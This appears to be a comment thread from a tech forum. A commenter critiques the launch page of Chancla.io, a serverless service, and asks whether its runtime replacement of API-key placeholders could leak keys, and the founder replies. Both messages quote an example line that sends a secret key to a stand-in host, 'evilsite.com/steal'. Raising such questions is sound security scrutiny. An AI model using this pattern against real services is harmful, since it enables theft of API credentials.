|
|
|
|
|
|
by insomniacity
2689 days ago
|
|
|
For your submission, you might want to think about writing a blog post instead of linking to your front page. The question mark in the title is also misleading when it's your own site. As for the site, you probably need to break your examples out into a separate page (apart from maybe one, that demonstrates some killer features), and think carefully about how much to include above the fold. There are 164 words across the three boxes, and you will lose people. As for the service - personally I don't quite get it. Is the idea "ease of PHP, power of serverless JVM" ? Not sure why I want inexperienced developers contributing to my projects? And a question: "During run-time, Chancla.io replaces the security token with the real API security key before calling the third-party API."
Then you show: new URL("https://api.mlab.com/api/1/databases/commerce-db/collections/cart?apiKey={{mlab_security_key}}")
Is that an example shared security key? Could I exfiltrate that by doing this?: new URL("https://evilsite.com/steal?key={{mlab_security_key}}")
|
|
|
Here's a few follow-on responses:
1. Your feedback about individual blog posts is completely correct. We will definitely go that direction with new content. 2. The killer feature list is still absent on the home page. We will correct that. 3. I can tell you are very experienced developer. If you are looking for new projects, please let me know, we can use someone like you on our team (not kidding). Regarding your inexperienced developers comment, I'm fairly certain all companies would love to have a team full of experienced developers, like yourself, I know I would. Unfortunately, not every company has a roster full of experienced developers. Most teams contain a blend of experienced and inexperienced developers, and the experienced developers are often too busy solving hard problems, which leaves the inexperienced developers to fend themselves. Not really the best scenario for most companies. Would you agree? 4. If you issue the command, new URL("https://evilsite.com/steal?key={{mlab_security_key}}") in our sandbox editor, you will not exfiltrate the actual security key. You will receive a page not found error or bad request error. That said, if you are able to exfiltrate the actual security key, please let us know, that's a security bug on our end.
Thank you again for your comments!